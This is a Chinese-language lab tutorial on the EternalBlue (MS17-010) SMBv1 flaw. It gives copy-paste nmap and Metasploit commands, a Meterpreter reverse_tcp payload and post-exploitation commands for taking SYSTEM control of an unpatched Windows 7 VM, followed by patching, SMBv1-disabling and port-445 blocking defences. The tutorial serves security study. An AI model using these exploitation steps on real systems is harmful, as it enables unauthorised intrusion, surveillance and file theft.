合规红线声明必看本文仅用于自建授权实验环境学习研究严禁对任何未授权设备、公共网络发起攻击违者需承担全部法律责任实验全程用虚拟机搭建杜绝物理机风险。 笔记核心速览攻击机Kali Linux任意稳定版自带渗透工具靶机未打补丁、未禁445端口的Windows 7虚拟机专属核心漏洞MS17-010基于SMBv1协议缺陷高危远程代码执行利用端口TCP 445核心原则仅实验、不越权、做完清痕迹一、漏洞基础考点必记1. 基础核心信息官方漏洞编号MS17-010全网唯一标准编号查补丁、找防护方案全靠它漏洞别称永恒之蓝EternalBlueNSA泄露工具WannaCry勒索病毒核心传播载体漏洞等级高危无需账号密码直接获取靶机System最高系统权限2. 影响系统范围精准区分受影响有漏洞Windows 7、Windows Server 2008/R2、Vista、XP/Server 2003部分版本无风险Windows 10/11、Server 2012及以上、已安装MS17-010补丁的系统3. 漏洞原理极简版Windows老旧SMBv1文件共享协议存在代码缺陷攻击者通过445端口发送恶意数据包绕过所有权限验证直接接管靶机可远程控制、窃取文件、植入木马。SMBv1本身隐患极多现代系统已用SMBv2/v3替代必须彻底禁用。二、授权实验实操步骤新手复制即用前置准备必做1. 攻击机Kali和靶机Win7用虚拟机搭建同局域网、网络互通ping命令验证2. 靶机Win7临时关闭防火墙未安装MS17-010补丁445端口开放。步骤1扫描靶机445端口确认可攻击打开Kali终端直接复制以下命令替换【靶机IP】为实际地址回车执行# 基础扫描命令复制改IP即可 nmap -p 445 靶机IP # 实操示例 nmap -p 445 192.168.59.135结果判断显示open→端口开放可继续显示closed/filtered→端口关闭/被拦截无法利用。步骤2启动Metasploit渗透框架终端直接输入命令等待加载完成出现MSFlogo即成功msfconsole步骤3加载永恒之蓝漏洞模块MSF控制台内输入直接复制执行无需修改use exploit/windows/smb/ms17_010_eternalblue步骤4配置靶机IP核心参数替换【靶机IP】复制执行这一步必须填对否则攻击失败# 基础配置 set rhosts 靶机IP # 实操示例 set rhosts 192.168.59.135 # 可选配置提升成功率Win7专用直接复制 set payload windows/x64/meterpreter/reverse_tcp步骤5执行攻击获取最高权限确认参数无误输入以下任意一个命令即可启动攻击# 二选一效果完全一样 run # 或 exploit成功标志终端出现Meterpreter 提示符代表已拿到靶机System最高权限。步骤6Meterpreter基础操作实验专用拿到会话后直接复制以下命令测试权限仅限实验不做破坏性操作# 查看当前权限验证System最高权限 getuid # 查看靶机系统信息 sysinfo # 截取靶机屏幕自动保存 screenshot # 查看靶机当前目录文件 ls # 切入靶机CMD命令行 shell # 退出CMD返回Meterpreter exit # 关闭会话结束攻击 exit步骤7实验收尾必清痕迹若实验中创建测试账号结束后务必删除靶机恢复原有防火墙设置# 靶机CMD内删除测试账号 net user test /del新手高频易错点避坑靶机防火墙没关→445端口被拦截攻击失败实验环境临时关闭即可攻击机和靶机不同网段→网络不通虚拟机网卡调为仅主机/桥接模式靶机已打MS17-010补丁→漏洞失效换纯净未补丁版Win7IP填写错误→仔细核对靶机IP别写错网段三、漏洞防御方案个人企业通用落地即生效遵循根源修复多层拦截老旧系统重点防护新版系统兜底加固核心三步必做1. 安装官方补丁根治漏洞搜索“MS17-010补丁”根据系统位数32/64位下载对应补丁安装重启生效Win7/Server2008已停更用火绒、360安全卫士的漏洞修复功能一键安装适配补丁2. 禁用SMBv1协议切断漏洞载体控制面板→程序→程序和功能→启用或关闭Windows功能找到SMB 1.0/CIFS 文件共享支持取消勾选确认配置重启电脑生效最核心防护步骤3. 封禁445端口阻断入侵入口控制面板→系统和安全→Windows防火墙→高级设置新建入站出站规则选择端口→TCP填入445→选择阻止连接命名规则保存启用防火墙彻底关闭445端口访问4. 额外兜底防护老旧系统尽快升级到Win10/11、Server2016及以上原生修复漏洞全程开启Windows防火墙安装正版杀毒软件开启实时防护不打开陌生附件、不下载不明软件避免恶意程序开启445端口四、核心知识点补充WannaCry勒索病毒就是利用永恒之蓝漏洞全球传播中招后全盘文件被加密索要赎金打补丁禁SMBv1可完全防范服务器场景可额外部署IDS/IPS设备监控445端口异常流量实时拦截攻击SMBv1协议已被微软弃用所有Windows系统都建议彻底禁用无正常使用需求五、笔记总结永恒之蓝MS17-010是网络安全入门经典漏洞案例适配CTF竞赛、面试备考、安全运维学习核心逻辑清晰漏洞核心SMBv1协议缺陷445端口仅针对老旧Windows系统实操核心扫描端口→启动MSF→加载模块→配置IP→执行攻击新手按步骤复制即可防护核心打补丁禁SMBv1封445端口三步到位彻底杜绝风险牢记底线网络安全学习以防护为核心严守法律红线绝不进行非法渗透操作。